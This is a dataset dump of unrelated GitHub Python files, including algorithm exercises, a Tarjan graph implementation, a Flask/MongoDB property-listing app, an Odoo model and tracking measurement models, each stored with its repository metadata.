spec_dic[raw] += 1\n \n if raw not in pep_dic:\n pep_dic[raw] = [xlink]\n else:\n if xlink not in pep_dic[raw]:\n pep_dic[raw].append(xlink)\n \n print(spec_dic)\n\n raw_list = sorted(list(spec_dic.keys()), key = lambda x: int(x.split('_')[-1]))\n\n for raw in raw_list:\n b.write(\",\".join([raw, str(len(pep_dic[raw])), str(spec_dic[raw])])+\"\\n\")\n # print(raw, len(pep_dic[raw]))\n\n a = sorted(pep_dic.items(), key = lambda x:len(x[1]), reverse = True)\n target = [x[0] for x in a[:10]]\n return target","repo_name":"daheitu/pFind_data_post_analysis.github.io","sub_path":"FTP/read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5573046085","text":"#Very similar to the min no. of coins reqd. to make a given change\n#Also greedy strategy works\n#https://www.interviewbit.com/problems/sum-of-fibonacci-numbers/\nimport bisect\nclass Solution:\n # @param A : integer\n # @return an integer\n def generateFibSeries(self,n):\n series=[1,1]\n fib_number=1\n i=2\n while fib_number<=n:\n fib_number=series[i-1]+series[i-2]\n series.append(fib_number)\n i+=1\n \n return series\n \n def giveNumberLessThanOrEqualsN(self,a,n):\n idx=bisect.bisect_left(a,n)\n numLess=a[idx]\n if(numLess>n):\n numLess=a[idx-1]\n return numLess \n \n def fibsum(self, A):\n fib_numbers=self.generateFibSeries(A)\n number=A\n count=0\n while number:\n count+=1\n numLess=self.giveNumberLessThanOrEqualsN(fib_numbers,number)\n number-=numLess\n \n \n \n return count\n","repo_name":"thecodearrow/InterviewBit-Python-Solutions","sub_path":"Greedy/Sum of fibbonacci numbers.py","file_name":"Sum of fibbonacci numbers.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"21691980688","text":"result = []\nfor i in range(7):\n data = int(input())\n if data%2 != 0:\n result.append(data)\n\nif not result : #emtpy->T\n print(-1)\nelse:\n print(sum(result))\n print(min(result))","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/thing-zoo/0.기초/홀수.py","file_name":"홀수.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40213997147","text":"# Python program to find articulation points in an undirected graph\n\nfrom collections import defaultdict\n\n\nclass TarzanGraph:\n\n def __init__(self, vertices):\n self.V = vertices \n self.graph = defaultdict(list) \n self.Time = 0\n\n # function to add an edge to graph\n def addEdge(self, u, v):\n self.graph[u].append(v)\n\n # implementation of SCC, bridges and articulation points.\n def SCC(self):\n self.timer = 0\n disc = [float(\"Inf\")] * (self.V) # discovery timer as per dfs traversal\n low = [float(\"Inf\")] * (self.V) # lowest possible discovery from any path\n\n stackMember = [False] * (self.V)\n st = []\n bridges = []\n ap = set()\n \n def dfs(node, root_node=False):\n disc[node] = self.timer\n low[node] = self.timer\n self.timer += 1\n \n stackMember[node] = True\n st.append(node)\n children = 0\n\n for child_node in self.graph[node]:\n if child_node == node:\n continue\n if disc[child_node] == float(\"Inf\"):\n dfs(child_node)\n low[node] = min(low[node], low[child_node])\n \n children += 1\n # case-1 for ap\n if root_node and children > 1:\n if node not in ap:\n ap.add(node)\n # case-2 for ap\n if not root_node and low[child_node] >= disc[node]:\n if node not in ap:\n ap.add(node)\n # for bridges\n if (low[child_node] > disc[node]):\n bridges.append((child_node, node))\n\n elif stackMember[child_node]:\n low[node] = min(low[node], disc[child_node])\n\n # head node found, pop the stack and print an SCC\n w = -1 # To store stack extracted vertices\n if low[node] == disc[node]:\n print(\"scc: >>\", end=\" \")\n while w != node:\n w = st.pop()\n print(w, end=\" \")\n stackMember[w] = False\n\n print()\n \n for i in range(self.V):\n if disc[i] == float(\"Inf\"):\n dfs(i, root_node=True)\n print(\"Bridges: \", bridges)\n print(\"AP: \", ap)\n\n\ng1 = TarzanGraph(5)\ng1.addEdge(1, 0)\ng1.addEdge(0, 2)\ng1.addEdge(2, 1)\ng1.addEdge(0, 3)\ng1.addEdge(3, 4)\n\nprint(\"Strongly connected Components in first graph \")\ng1.SCC()\n\ng2 = TarzanGraph(4)\ng2.addEdge(0, 1)\ng2.addEdge(1, 2)\ng2.addEdge(2, 3)\nprint(\"Strongly connected Components in first graph \")\ng2.SCC()\n\n\ng1 = TarzanGraph(5)\ng1.addEdge(1, 0)\ng1.addEdge(0, 2)\ng1.addEdge(2, 1)\ng1.addEdge(0, 3)\ng1.addEdge(3, 4)\nprint(\"Strongly connected Components in first graph \")\ng1.SCC()\n\ng2 = TarzanGraph(4)\ng2.addEdge(0, 1)\ng2.addEdge(1, 2)\ng2.addEdge(2, 3)\nprint(\"\\nStrongly connected Components in second graph \")\ng2.SCC()\n\n\ng3 = TarzanGraph(7)\ng3.addEdge(0, 1)\ng3.addEdge(1, 2)\ng3.addEdge(2, 0)\ng3.addEdge(1, 3)\ng3.addEdge(1, 4)\ng3.addEdge(1, 6)\ng3.addEdge(3, 5)\ng3.addEdge(4, 5)\nprint(\"\\nStrongly connected Components in third graph \")\ng3.SCC()\n\ng4 = TarzanGraph(11)\ng4.addEdge(0, 1)\ng4.addEdge(0, 3)\ng4.addEdge(1, 2)\ng4.addEdge(1, 4)\ng4.addEdge(2, 0)\ng4.addEdge(2, 6)\ng4.addEdge(3, 2)\ng4.addEdge(4, 5)\ng4.addEdge(4, 6)\ng4.addEdge(5, 6)\ng4.addEdge(5, 7)\ng4.addEdge(5, 8)\ng4.addEdge(5, 9)\ng4.addEdge(6, 4)\ng4.addEdge(7, 9)\ng4.addEdge(8, 9)\ng4.addEdge(9, 8)\nprint(\"\\nStrongly connected Components in fourth graph \")\ng4.SCC()\n\n\ng5 = TarzanGraph(5)\ng5.addEdge(0, 1)\ng5.addEdge(1, 2)\ng5.addEdge(2, 3)\ng5.addEdge(2, 4)\ng5.addEdge(3, 0)\ng5.addEdge(4, 2)\nprint(\"\\nStrongly connected Components in fifth graph \")\ng5.SCC()\n","repo_name":"vKrypto/practice-dsa","sub_path":"data_structures/graph/tarjan.py","file_name":"tarjan.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"41531295596","text":"import nodes.handler\nimport virtuosoWrapper.virtuosoWrapper as rdfWrapper\nfrom Dataset.dataset import dataset\n\nclass label_set(dataset):\n\n def insert_in_annetto(self):\n res=rdfWrapper.new_named_individual(self.name)\n if res==0:\n rdfWrapper.new_type(self.name, self.type)\n\n def __init__(self,node):\n super(label_set, self).__init__(node)\n self.count=0\n self.name=node.get_name()+\"_label_set\"\n self.type=\"Labelset\"\n for elem in self.node.get_output():\n for num in elem.dim:\n print(\n '''\n We want to take the number of labels.With that,we want only the last dimension size.\n Thus,we iterate and we assign the last one.\n '''\n )\n if int(num.size) > 0:\n self.count=int(num.size)\n print(\"LOGGIND:Found size\", self.count)","repo_name":"JoHNNyB92/thesis_code","sub_path":"thesis/tensorflow_parse_files/Dataset/label_set.py","file_name":"label_set.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23069742293","text":"import os\nfrom flask import (\n Flask, flash, render_template, jsonify,\n redirect, request, session, url_for, abort)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nfrom bson import json_util\nfrom werkzeug.security import generate_password_hash, check_password_hash\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\n\n'''\nIn development the environmental variables are saved on the env.py\nand in production the environmental variables are\nsaved on the Config Var in Heroku\n'''\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\n\n# SET AN INSTANCE OF PyMongo\nmongo = PyMongo(app)\n\n\ndef string_to_array(str_to_split):\n \"\"\"\n FUNCTION TO CONVER STRINGS\n SEPARATED BY '/N' TO ARRAYS\n \"\"\"\n array = str_to_split.split(\"\\n\")\n return array\n\n\ndef admin():\n \"\"\"\n Verify is user is in session and is the admin user\n \"\"\"\n return session['user'] == 'admin'\n\n\n@app.route(\"/get_properties\")\ndef get_properties():\n \"\"\"\n READ PROPERTIES FUNCTIONALITY\n \"\"\"\n properties = list(mongo.db.properties.find())\n return render_template(\"properties.html\", properties=properties)\n\n\n@app.route(\"/update_property_feature/\", methods=[\"POST\"])\ndef update_property_feature(property_id):\n \"\"\"\n Update property featured\n \"\"\"\n try:\n featured = request.json['featured']\n mongo.db.properties.update_one(\n {\"_id\": ObjectId(property_id)}, {\"$set\": {\"featured\": featured}})\n return \"\", 204\n except Exception as e:\n return \"Bad Request\", 400\n\n\n@app.route('/')\n@app.route(\"/get_featured_properties\")\ndef get_featured_properties():\n \"\"\"\n READ FEATURED PROPERTY FUNCTIONALITY\n \"\"\"\n featured_properties = list(mongo.db.properties.find({'featured': True}))\n return render_template(\"index.html\", properties=featured_properties)\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"\n SIGN UP / REGISTER FUNCTIONALITY\n \"\"\"\n if is_authenticated():\n flash(\"Please logout first to execute this operation.\")\n redirect(url_for(\"get_properties\"))\n\n if request.method == \"POST\":\n # then check if the username exists within the database\n existing_user = mongo.db.users.find_one(\n # check if Mongo username matches input for username in form\n {\"username\": request.form.get(\"username\").lower()})\n\n # if match with exisiting user then give message\n if existing_user:\n flash(\"Oh no, this username already exists...\")\n # take the user back to the sign up page\n return redirect(url_for(\"register\"))\n\n # if no user is found, then insert data in the dictionary\n register = {\n \"username\": request.form.get(\"username\").lower(),\n \"email\": request.form.get(\"email\"),\n \"password\": generate_password_hash(request.form.get(\"password\")),\n \"bookmarks\": []\n }\n mongo.db.users.insert_one(register)\n\n # put the new user into 'session' cookie\n session[\"user\"] = request.form.get(\"username\").lower()\n # to replace with modal\n flash(\"Registration successful! You can now view or share properties!\")\n return redirect(url_for(\"profile\"))\n\n return render_template(\"register.html\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"\n LOG IN FUNCTIONALITY\n \"\"\"\n if is_authenticated():\n return redirect(url_for(\"get_properties\"))\n\n if request.method == \"POST\":\n # check if username exists in db\n existing_user = mongo.db.users.find_one(\n {\"username\": request.form.get(\"username\").lower()})\n\n if existing_user:\n # ensure hashed password matches user input\n if check_password_hash(\n existing_user[\"password\"], request.form.get(\"password\")):\n session[\"user\"] = request.form.get(\"username\").lower()\n flash(f\"Welcome, {request.form.get('username')}\")\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n else:\n # invalid password match\n flash(\"Incorrect Username and/or Password\")\n return redirect(url_for(\"login\"))\n\n else:\n # username doesn't exist\n flash(\"Incorrect Username and/or Password\")\n return redirect(url_for(\"login\"))\n\n return render_template(\"login.html\")\n\n\n@app.route(\"/profile\", methods=[\"GET\"])\ndef profile():\n \"\"\"\n User Profile. Find username in the database and retrieve the\n username. Then render the profile template with the user's name.\n \"\"\"\n if not is_authenticated():\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n\n # find the user in the database\n user = mongo.db.users.find_one_or_404(\n # take the session user's username from Mongo\n {\"username\": session[\"user\"]})\n # if the user has a bookmark try the execute the below\n bookmarks = mongo.db.properties.find({'_id':\n {'$in': user['bookmarks']}})\n # return profile page with user's unique name\n return render_template(\"profile.html\",\n username=session[\"user\"], properties=bookmarks)\n\n\n@app.route(\"/bookmark/\", methods=[\"GET\", \"POST\"])\ndef bookmark(property_id):\n \"\"\"\n Bookmark Functionality\n \"\"\"\n if request.method == \"GET\":\n user_bookmarks = list(mongo.db.users.find_one({\"username\": session\n [\"user\"].lower()})\n ['bookmarks'])\n if ObjectId(property_id) not in user_bookmarks:\n mongo.db.users.find_one_and_update(\n {\"username\": session[\"user\"].lower()},\n {\"$push\": {\"bookmarks\": ObjectId(property_id)}})\n flash(\"Property has been added to your profile.\")\n else:\n flash(\"Property have already been bookmarked.\")\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n\n\n@app.route(\"/delete_bookmark/\")\ndef delete_bookmark(property_id):\n \"\"\"\n Delete Bookmark Functionality. To remove a bookmark from user profile.\n \"\"\"\n if not is_authenticated():\n flash(\"You need to log in to execute this action.\")\n return redirect(url_for(\"login\"))\n\n try:\n mongo.db.users.find_one_and_update(\n {\"username\": session[\"user\"].lower()},\n {\"$pull\": {\"bookmarks\": ObjectId(property_id)}})\n flash(\"Bookmark successfully removed.\")\n except Exception:\n user_bookmarks = mongo.db.users.find_one({\"username\": session[\"user\"].\n lower()})['bookmarks']\n user_bookmarks.remove(property_id)\n mongo.db.users.find_one_and_update({\"username\": session[\"user\"].\n lower()}, {'$set': {\"bookmarks\":\n user_bookmarks\n }})\n finally:\n return redirect(url_for(\"profile\"))\n\n\n@ app.route(\"/logout\")\ndef logout():\n \"\"\"\n LOG OUT FUNCTIONALITY\n \"\"\"\n # If not user in session Redirect to Properties\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for('get_properties'))\n\n flash(\"You have been logged out\")\n session.pop(\"user\")\n return redirect(url_for(\"get_properties\"))\n\n\n@ app.route(\"/view_property/\")\ndef view_property(property_id):\n \"\"\"\n FUNTION TO SEE A PROPERTY AFTER CLICKING ON \"VIEW PROPERTY\" BUTTON\n \"\"\"\n # Increment the number of views everytime a property is seen\n mongo.db.properties.update_one({\"_id\": ObjectId(property_id)},\n {'$inc': {'views': 1}})\n property = mongo.db.properties.find_one({\"_id\": ObjectId(property_id)})\n return render_template('view_property.html', property=property)\n\n\n@ app.route(\"/add_property\", methods=[\"GET\", \"POST\"])\ndef add_property():\n \"\"\"\n Add_PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You don't have permission to execute this operation.\")\n return redirect(\"get_properties\")\n\n if request.method == \"POST\":\n property = {\n \"category_name\": request.form.get(\"category_name\"),\n \"property_name\": request.form.get(\"property_name\"),\n \"property_description\": request.form.get\n (\"property_description\"),\n \"property_details\": string_to_array(request.form.get\n (\"property_details\")),\n \"property_added_date\": request.form.get(\"property_added_date\"),\n \"property_image\": request.form.get(\"property_image\"),\n \"author\": session[\"user\"],\n \"type\": request.form.get(\"type\"),\n \"price\": request.form.get(\"price\"),\n \"sourcing_fee\": request.form.get(\"sourcing_fee\"),\n \"amenities\": request.form.getlist('amenities'),\n \"features\": string_to_array(request.form.get(\"features\"))\n }\n mongo.db.properties.insert_one(property)\n flash(\"Your Property Successfully Added\")\n return redirect(url_for(\"get_properties\"))\n\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n type = mongo.db.type.find().sort(\"type\", 1)\n amenities = mongo.db.amenities.find().sort(\"amenity\", 1)\n features = mongo.db.amenities.find().sort(\"feature\", 1)\n return render_template(\"add_property.html\", categories=categories,\n type=type, amenities=amenities,\n property=features)\n\n\n@ app.route(\"/edit_property/\", methods=[\"GET\", \"POST\"])\ndef edit_property(property_id):\n \"\"\"\n Edit_PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You don't have permission to execute this operation.\")\n return redirect(\"get_properties\")\n\n if not is_object_id_valid(property_id):\n abort(404)\n\n property = mongo.db.properties.find_one_or_404(\n {\"_id\": ObjectId(property_id)})\n user = session['user']\n\n if user == \"admin\" or user == property[\"author\"]:\n if request.method == \"POST\":\n submit = {\n \"category_name\": request.form.get(\"category_name\"),\n \"property_name\": request.form.get(\"property_name\"),\n \"property_description\": request.form.get(\"property_description\"),\n \"property_details\": string_to_array(request.form.get\n (\"property_details\")),\n \"property_added_date\": request.form.get(\"property_added_date\"),\n \"property_image\": request.form.get(\"property_image\"),\n \"author\": session[\"user\"],\n \"type\": request.form.get(\"type\"),\n \"price\": request.form.get(\"price\"),\n \"amenities\": request.form.getlist('amenities'),\n \"sourcing_fee\": request.form.get(\"sourcing_fee\"),\n \"features\": string_to_array(request.form.get(\"features\"))\n }\n mongo.db.properties.update_one(\n {\"_id\": ObjectId(property_id)}, {\"$set\": submit})\n flash(\"Property successfully updated\")\n return redirect(url_for(\"edit_property\",\n property_id=ObjectId(property_id)))\n\n # This object is used for rendering in the form\n property = mongo.db.properties.find_one({\"_id\": ObjectId(property_id)})\n read_property_obj = {**property}\n # copy the object from the DataBase, because the object\n # from the DB is immutable (cannot change values)\n read_property_obj['property_details'] = \"\".join(read_property_obj\n ['property_details'])\n read_property_obj['features'] = \"\".join(read_property_obj['features'])\n read_property_obj['amenities'] = \"\".join(\n read_property_obj['amenities'])\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n type = mongo.db.type.find().sort(\"type\", 1)\n amenities = mongo.db.amenities.find().sort(\"amenity\")\n return render_template(\"edit_property.html\",\n property=read_property_obj, categories=categories,\n type=type, amenities=amenities)\n\n\n@ app.route(\"/delete_property/\")\ndef delete_property(property_id):\n \"\"\"\n DELETE_PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n if not is_object_id_valid(property_id):\n abort(404)\n\n result = mongo.db.properties.find_one_and_delete(\n {\"_id\": ObjectId(property_id), \"author\": session['user']})\n\n if result:\n flash(\"Property Successfully Deleted!\")\n\n return redirect(url_for(\"get_properties\"))\n\n\n@ app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n \"\"\"\n SEARCH FOR A PROPERTY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"get_properties\"))\n\n query = request.form.get(\"query\")\n properties = list(mongo.db.properties.find({\"$text\": {\"$search\": query}}))\n categories = list(mongo.db.categories.find().sort(\"category_name\", 1))\n return render_template(\"properties.html\", properties=properties,\n categories=categories)\n\n\n@ app.route(\"/admin_dashboard\")\ndef admin_dashboard():\n \"\"\"\n ADMIN DASHBOARD FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"get_properties\"))\n\n # check that someone isn't brute-forcing the url get admin functionalities\n if admin():\n categories = list(mongo.db.categories.find().sort(\"category_name\", 1))\n else:\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n # return the admin dashboard template\n return render_template(\"admin_dashboard.html\", categories=categories)\n\n\n@ app.route(\"/add_category\", methods=[\"GET\", \"POST\"])\ndef add_category():\n \"\"\"\n ADD A CATEGORY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"get_properties\"))\n\n if admin():\n if request.method == \"POST\":\n category = {\n \"category_name\": request.form.get(\"category_name\")\n }\n\n mongo.db.categories.insert_one(category)\n flash(\"The new strategy was added\")\n return redirect(url_for(\"admin_dashboard\"))\n else:\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n\n return render_template(\"add_category.html\")\n\n\n@ app.route(\"/edit_category/\", methods=[\"GET\", \"POST\"])\ndef edit_category(category_id):\n \"\"\"\n EDIT A CATEGORY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n if admin():\n if request.method == \"POST\":\n submit = {\n \"category_name\": request.form.get(\"category_name\")\n }\n mongo.db.categories.update_one(\n {\"_id\": ObjectId(category_id)}, {\"$set\": submit})\n flash(\"Strategy Successfully Updated\")\n return redirect(url_for(\"admin_dashboard\"))\n\n category = mongo.db.categories.find_one({\"_id\": ObjectId(category_id)})\n else:\n flash('You are not authorised to view this page')\n return redirect(url_for(\"get_featured_properties\"))\n return render_template(\"edit_category.html\", category=category)\n\n\n@ app.route(\"/delete_category/\")\ndef delete_category(category_id):\n \"\"\"\n DELETE A CATEGORY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n mongo.db.categories.delete_one({\"_id\": ObjectId(category_id)})\n flash(\"Strategy Successfully Deleted\")\n return redirect(url_for(\"admin_dashboard\"))\n\n\n@ app.route('/change_password/', methods=[\"GET\", \"POST\"])\ndef change_password(username):\n \"\"\"\n DELETE A CATEGORY FUNCTIONALITY\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n if request.method == \"POST\":\n newPassword = generate_password_hash(request.form.get\n (\"password_change\"))\n mongo.db.users.update_one(\n {\"username\": username},\n {'$set':\n {\"password\": newPassword}})\n flash(\"Your password has been updated\")\n return redirect(url_for(\"get_properties\"))\n if session:\n return redirect(url_for(\"get_properties\"))\n return redirect(url_for(\n \"profile\", username=session[\"user\"]))\n\n\n@ app.route('/delete_account/', methods=[\"GET\", \"POST\"])\ndef delete_account(user_id):\n \"\"\"\n DELETE PROFILE FUNCTIONALITY\n \"\"\"\n user = mongo.db.users.find_one({'username': session[\"user\"]})\n # Checks if password matches existing password in database\n if check_password_hash(user[\"password\"],\n request.form.get(\"confirm_to_delete\")):\n flash(\"Your account has been deleted successfully.\")\n session.pop(\"user\")\n mongo.db.users.delete_one({\"_id\": ObjectId(user['_id'])})\n return redirect(url_for(\"get_featured_properties\"))\n else:\n flash(\"The password you entered was incorrect. Please try again!\")\n return redirect(url_for(\"profile\"))\n # return to home page page\n return redirect(url_for(\"get_featured_properties\"))\n\n\n@ app.route(\"/contact\")\ndef contact():\n \"\"\"\n Navigates to contact page\n \"\"\"\n if not is_authenticated():\n flash(\"You are currently not logged in\")\n return redirect(url_for(\"login\"))\n\n return render_template(\"contact.html\")\n\n\n@ app.errorhandler(401)\ndef unauthorized_access(e):\n \"\"\"\n Renders a custom 401 error page with a button\n that takes the user back to the log in or register pages.\n \"\"\"\n return render_template('errors/401.html'), 401\n\n\n@ app.errorhandler(404)\ndef page_not_found(e):\n \"\"\"\n Renders a custom 404 error page with a button\n that takes the user back to the home page.\n \"\"\"\n return render_template('errors/404.html'), 404\n\n\n@ app.errorhandler(500)\ndef not_found_server(e):\n \"\"\"\n Renders a custom 500 error page with a button\n that takes the user back to the home page.\n \"\"\"\n return render_template('errors/500.html'), 500\n\n\ndef is_authenticated():\n \"\"\"\n Ensure that user is authenticated\n \"\"\"\n return 'user' in session\n\n\ndef is_object_id_valid(id_value):\n \"\"\"\n Validate is the id_value is a valid ObjectId\n \"\"\"\n return id_value != \"\" and ObjectId.is_valid(id_value)\n\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=False)\n","repo_name":"TNamdarian/seven-terraces","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12166817206","text":"import json\nimport os\n\nRES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"res\")\n\n\ndef get_resource_path(resource):\n return os.path.join(RES_DIR, resource)\n\n\ndef get_strings_resource_path(resource, lang=\"en-uk\"):\n return get_resource_path(os.path.join(\"strings\", lang, resource))\n\n\nRES_PATHS = {\n \"strings\": get_strings_resource_path(\"strings.json\"),\n \"spells\": get_strings_resource_path(\"spells.json\"),\n \"global\": get_resource_path(\"global.json\"),\n \"keys\": get_resource_path(\"keys.json\"),\n \"users\": get_resource_path(\"users.json\"),\n}\n\n\ndef load_resource(resource):\n \"\"\" Reads json resource and returns the raw contents \"\"\"\n if resource not in RES_PATHS:\n raise Exception(f\"Unknown resource: {resource}\")\n\n with open(RES_PATHS[resource], 'r', encoding='utf8') as f:\n data = json.load(f)\n\n return data\n\n\ndef save_resource(resource, data):\n \"\"\" Saves json resource from data structure into disk \"\"\"\n if resource not in RES_PATHS:\n raise Exception(f\"Unknown resource: {resource}\")\n\n with open(RES_PATHS[resource], 'w', encoding='utf8') as f:\n json.dump(data, f, sort_keys=True, indent=4, separators=(',', ': '))\n\n\ndef get_quotes():\n quotes_file = get_resource_path(\"quotes.txt\")\n\n with open(quotes_file, 'r', encoding=\"utf-8\") as f:\n data = f.read()\n data = data.split(\"\\n\\n\")\n for i, elem in enumerate(data):\n st = elem.find('\"')\n en = elem.find('\"', st + 3)\n data[i] = elem[st + 1:en]\n\n return data\n","repo_name":"toridango/DanBot2","sub_path":"danbot/db_handler.py","file_name":"db_handler.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"38323513632","text":"from osv import osv, fields\nimport exceptions\nfrom tools.translate import _\n\n\nclass ResCompany(osv.osv):\n _inherit = 'res.company'\n\n _columns = {\n 'sii_enabled': fields.boolean(string='Enable SII'),\n 'sii_test': fields.boolean(string='Test Enviroment'),\n 'sii_method': fields.selection(\n string='Method',\n selection=[('auto', 'Automatic'),('manual', 'Manual')],\n help='By default the invoice send in validate process, with manual '\n 'method, there a button to send the invoice.'),\n 'use_connector': fields.boolean(\n string='Use connector',\n help='Check it to use connector instead to send the invoice '\n 'when it is validated', readonly=True),\n 'chart_template_id': fields.many2one('account.chart.template', 'Chart Template',\n required=True)\n }\n\n _defaults = {\n 'sii_method': 'auto',\n }\n\nResCompany()\n\n","repo_name":"Creacionescpm/l10n_es_aeat_sii-11.0.8.0.1.1.4","sub_path":"l10n_es_aeat_sii/models/res_company.py","file_name":"res_company.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14426287937","text":"import numpy as np\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass measmodel:\n \"\"\"Measurement model class\"\"\"\n\n def CVmeasmodel(self, sigma: float):\n\n self.d = 2\n self.H = lambda x: np.array([[1, 0, 0, 0], [0, 1, 0, 0]])\n self.R = sigma**2 * np.eye(self.d)\n self.h = lambda x: np.matmul(self.H(x), x)\n\n def CTmeasmodel(self, sigma: float):\n\n self.d = 2\n self.H = lambda x: np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]])\n self.R = sigma**2 * np.eye(self.d)\n self.h = lambda x: np.matmul(self.H(x), x)\n\n def bearingmeasmodel(self, sigma: float, s: np.ndarray):\n\n self.d = 1\n def rng(x): return np.linalg.norm(x[0:1] - s)\n self.h = lambda x: np.arctan2(x[1] - s[1], x[0] - s[0])\n\n # Measurement model Jacobian\n self.H = lambda x: np.array(\n [[-(x[1] - s[1]) / (rng(x)**2), (x[0] - s[0]) / (rng(x)**2), np.zeros([np.shape(x)[1] - 2])]])\n\n # Measurement noise covariance\n self.R = sigma**2\n\n def rangebearingmeasmodel(\n self,\n sigma_r: float,\n sigma_b: float,\n s: np.ndarray):\n\n self.d = 2\n def rng(x): return np.linalg.norm(x[0:2] - s)\n def ber(x): return np.arctan2(x[1] - s[1], x[0] - s[0])\n\n self.h = lambda x: np.array([rng(x), ber(x)])\n\n # Measurement model Jacobian\n self.H = lambda x: np.array([np.pad([(x[0] - s[0]) / rng(x),\n (x[1] - s[1]) / rng(x)],\n (0,\n x.shape[0] - 2)),\n np.pad([-(x[1] - s[1]) / (rng(x)**2),\n (x[0] - s[0]) / (rng(x)**2)],\n (0,\n x.shape[0] - 2))])\n\n # Measurement noise covariance\n self.R = np.array([[sigma_r**2, 0], [0, sigma_b**2]])\n","repo_name":"mgoar/mtt-phd-filter","sub_path":"measmodel.py","file_name":"measmodel.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"782368530","text":"import inspect\r\nimport sys\r\nimport itertools\r\nimport random\r\nfrom abc import ABC, abstractproperty\r\nfrom distutils.version import LooseVersion\r\nimport base64\r\nimport hashlib\r\nimport logging\r\nimport os\r\nfrom typing import Union\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfrom ipso_phen.ipapi.base.ip_abstract import BaseImageProcessor\r\nfrom ipso_phen.ipapi.tools.common_functions import make_safe_name\r\nimport ipso_phen.ipapi.base.ip_common as ipc\r\nfrom ipso_phen.ipapi.tools.common_functions import force_directories\r\nimport ipso_phen.ipapi.tools.regions as regions\r\n\r\nCLASS_NAME_KEY = \"class__name__\"\r\nMODULE_NAME_KEY = \"module__name__\"\r\nPARAMS_NAME_KEY = \"params\"\r\nGRID_SEARCH_PARAMS_NAME_KEY = \"grid_search_params\"\r\n\r\nlogger = logging.getLogger(os.path.splitext(__name__)[-1].replace(\".\", \"\"))\r\n\r\n\r\nclass IptParam(object):\r\n def __init__(self, **kwargs):\r\n self.name = kwargs.get(\"name\", \"no_name\")\r\n self.desc = kwargs.get(\"desc\", \"no desc\")\r\n self.default_value = kwargs.get(\"default_value\", \"no default\")\r\n self.allowed_values = kwargs.get(\"allowed_values\", None)\r\n if self.allowed_values is not None and isinstance(self.allowed_values, list):\r\n self.allowed_values = tuple(self.allowed_values)\r\n self.hint = kwargs.get(\"hint\", \"no clue\")\r\n self.widget_type = kwargs.get(\"widget_type\", \"unk_wt\")\r\n self.kind = kwargs.get(\"kind\", \"unk_k\")\r\n self.options = kwargs.get(\"options\", {})\r\n self._value = kwargs.get(\"_value\", self.default_value)\r\n self.on_change = None\r\n self._widgets = {}\r\n self._grid_search_options = kwargs.get(\r\n \"_grid_search_options\", str(self.default_value)\r\n )\r\n self.grid_search_mode = False\r\n\r\n self.ui_update_callbacks = {}\r\n\r\n def __str__(self):\r\n return f\"[{self.name}:{self.value}]\"\r\n\r\n 